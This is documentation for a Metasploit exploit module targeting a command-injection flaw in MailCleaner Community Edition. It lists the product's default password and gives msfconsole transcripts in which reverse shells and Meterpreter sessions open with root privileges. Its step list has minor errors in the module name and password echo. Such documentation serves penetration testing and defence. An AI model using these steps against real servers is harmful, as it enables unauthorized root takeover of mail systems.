adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
91633fdad7e9474debefbfd044d2b8bc7652deee
metasploit-gs/documentation/modules/exploit/linux/http/mailcleaner_exec.md
T
cgranleese-r7 adff497bd2 Updates msf5 as well
2025-07-17 11:51:29 +01:00

86 lines
2.9 KiB
Markdown
Raw Blame History

## Description
This module exploits the command injection vulnerability of MailCleaner Community Edition product. An authenticated user can execute an operating system command under the context of the web server user which is root.
### Vulnerable Application
You can download ISO file from following URL.
[https://www.mailcleaner.org/latest-downloads/](https://www.mailcleaner.org/latest-downloads/)
At the time of this writing all the passwords of users such as root or admin user was "MCPassw0rd".
## Verification Steps
A successful check of the exploit will look like this:
1. Start `msfconsole`
2. `use use exploit/linux/http/mailcleaner`
3. Set `RHOST`
4. Set `LHOST`
5. Set `USERNAME`
6. Set `PASSWORD`
7. Run `exploit`
8. **Verify** that you are seeing ` Awesome..! Authenticated`.
9. **Verify** that you are getting `meterpreter` session.
## Scenarios
```
msf > use exploit/linux/http/mailcleaner_exec
msf exploit(linux/http/mailcleaner_exec) > set RHOSTS 12.0.0.100
RHOSTS => 12.0.0.100
msf exploit(linux/http/mailcleaner_exec) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf exploit(linux/http/mailcleaner_exec) > set USERNAME admin
USERNAME => admin
msf exploit(linux/http/mailcleaner_exec) > set PASSWORD <password>
PASSWORD => qwe123
msf exploit(linux/http/mailcleaner_exec) > run
[*] Started reverse TCP handler on 12.0.0.1:4444
[*] Performing authentication...
[+] Awesome..! Authenticated with admin:<password>
[*] Exploiting command injection flaw
[*] Sending stage (53508 bytes) to 12.0.0.100
[*] Meterpreter session 1 opened (12.0.0.1:4444 -> 12.0.0.100:44974) at 2018-12-19 17:24:44 +0300
[*] Sending stage (53508 bytes) to 12.0.0.100
[*] Meterpreter session 2 opened (12.0.0.1:4444 -> 12.0.0.100:44975) at 2018-12-19 17:24:45 +0300
meterpreter >
```
You can also use cmd payloads.
```
msf > use exploit/linux/http/mailcleaner_exec
msf exploit(linux/http/mailcleaner_exec) > set RHOSTS 12.0.0.100
RHOSTS => 12.0.0.100
msf exploit(linux/http/mailcleaner_exec) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf exploit(linux/http/mailcleaner_exec) > set USERNAME admin
USERNAME => admin
msf exploit(linux/http/mailcleaner_exec) > set PASSWORD <password>
msf exploit(linux/http/mailcleaner_exec) > set target 1
msf exploit(linux/http/mailcleaner_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(linux/http/mailcleaner_exec) > run
[*] Started reverse TCP double handler on 12.0.0.1:4444
[*] Performing authentication...
[+] Awesome..! Authenticated with admin:MCPassw0rd
[*] Exploiting command injection flaw
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo P6zixt2asYXZ29NE;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "P6zixt2asYXZ29NE\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (12.0.0.1:4444 -> 12.0.0.100:53996) at 2018-12-20 12:09:32 +0300
id
uid=0(root) gid=1003(mailcleaner) groups=1003(mailcleaner)
```
Reference in New Issue View Git Blame Copy Permalink